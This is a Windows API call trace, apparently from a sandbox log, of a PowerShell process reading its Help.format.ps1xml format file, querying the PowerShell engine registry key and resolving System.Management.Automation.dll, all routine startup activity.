	[0145.263] VirtualQuery (in: lpAddress=0x1cba60, lpBuffer=0x1cc920, dwLength=0x30 | out: lpBuffer=0x1cc920*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0145.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cc870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0145.263] SetErrorMode (uMode=0x1) returned 0x1
	[0145.264] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0145.264] GetFileType (hFile=0x320) returned 0x1
	[0145.264] SetErrorMode (uMode=0x1) returned 0x1
	[0145.264] GetFileType (hFile=0x320) returned 0x1
	[0145.264] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.266] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.267] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.267] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.268] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.269] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.269] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.269] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.270] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.271] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.271] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.271] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.272] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.409] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.409] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.409] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.412] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.412] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.412] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.413] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.413] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.413] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.414] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.414] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.414] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.415] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.415] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.415] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.415] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.416] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.416] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.416] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.421] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.421] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.421] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.422] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.422] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.423] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.423] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.423] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.424] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.424] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.424] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.425] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.425] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.425] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.426] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.426] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.426] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.427] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.427] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.427] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.427] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.428] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.428] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.428] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.429] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.429] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.429] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.430] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.430] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.430] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0145.430] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0xf37, lpOverlapped=0x0) returned 1
	[0145.431] ReadFile (in: hFile=0x320, lpBuffer=0x36c1b6f, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c1b6f*, lpNumberOfBytesRead=0x1ccdf8*=0x0, lpOverlapped=0x0) returned 1
	[0145.431] ReadFile (in: hFile=0x320, lpBuffer=0x36c24d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x36c24d0*, lpNumberOfBytesRead=0x1ccdf8*=0x0, lpOverlapped=0x0) returned 1
	[0145.431] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccb40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0145.431] SetErrorMode (uMode=0x1) returned 0x1
	[0145.431] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ccda0 | out: lpFileInformation=0x1ccda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0145.432] SetErrorMode (uMode=0x1) returned 0x1
	[0145.432] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0145.432] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cce88 | out: phkResult=0x1cce88*=0x320) returned 0x0
	[0145.432] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cce0c, lpData=0x0, lpcbData=0x1cce08*=0x0 | out: lpType=0x1cce0c*=0x1, lpData=0x0, lpcbData=0x1cce08*=0x56) returned 0x0
	[0145.432] CoTaskMemAlloc (cb=0x5a) returned 0x1b7c0c10
	[0145.432] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ccddc, lpData=0x1b7c0c10, lpcbData=0x1ccdd8*=0x56 | out: lpType=0x1ccddc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ccdd8*=0x56) returned 0x0
	[0145.432] CoTaskMemFree (pv=0x1b7c0c10) 
	[0145.432] RegCloseKey (hKey=0x320) returned 0x0
	[0145.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccad0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0145.433] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cc980, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0145.449] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x83c336d2, Data2=0x74ef, Data3=0x4161, Data4=([0]=0x86, [1]=0x23, [2]=0xe7, [3]=0x22, [4]=0x7c, [5]=0xfd, [6]=0x10, [7]=0xc))) returned 0x0
	[0145.449] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x7647afdf, Data2=0x5e06, Data3=0x4ae9, Data4=([0]=0x85, [1]=0x69, [2]=0xcc, [3]=0x38, [4]=0x53, [5]=0xa2, [6]=0x40, [7]=0xd))) returned 0x0
	[0145.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.449] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.865] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x86f50706, Data2=0x7860, Data3=0x4e26, Data4=([0]=0xbb, [1]=0x78, [2]=0x53, [3]=0xcf, [4]=0x74, [5]=0xc4, [6]=0xee, [7]=0x4))) returned 0x0
	[0145.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0145.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
